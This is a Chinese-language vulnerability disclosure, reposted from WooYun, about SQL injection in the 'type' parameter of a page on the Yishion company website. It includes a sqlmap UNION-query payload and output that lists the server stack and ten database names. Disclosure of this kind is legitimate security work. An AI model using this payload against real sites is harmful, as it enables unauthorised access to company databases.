神刀安全网

漏洞标题: YISHION以纯官方网站某处sql注入

漏洞详情

披露状态:

2016-01-26: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-03-10: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

http://**.**.**.**/hot.php?type=瀛﹂櫌绯诲垪

注入点

域名备案

备案号: 粤ICP备07502554号-3

性质: 企业

名称: 东莞市以纯集团有限公司

审核时间: 2015-02-11

漏洞证明:

code 区域
Place: GET
Parameter: type
Type: UNION query
Title: MySQL UNION query (NULL) - 8 columns
Payload: type=??????' LIMIT 1,1 UNION ALL SELECT CONCAT(0x3a6370643a,0x6f534
c6b6e4369517079,0x3a6561693a), NULL, NULL, NULL, NULL, NULL, NULL, NULL#
---
[04:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL 5
[04:07:22] [INFO] fetching database names
available databases [10]:
[*] haitou_maps
[*] information_schema
[*] mysql
[*] office
[*] prize
[*] shop
[*] y2
[*] yc_address
[*] yishion
[*] yishion-new

修复方案:

NULL

版权声明:转载请注明来源 路人甲@乌云

转载本站任何文章请注明:转载至神刀安全网,谢谢神刀安全网 » 漏洞标题: YISHION以纯官方网站某处sql注入

分享到:更多 ()

评论 抢沙发

  • 昵称 (必填)
  • 邮箱 (必填)
  • 网址
分享按钮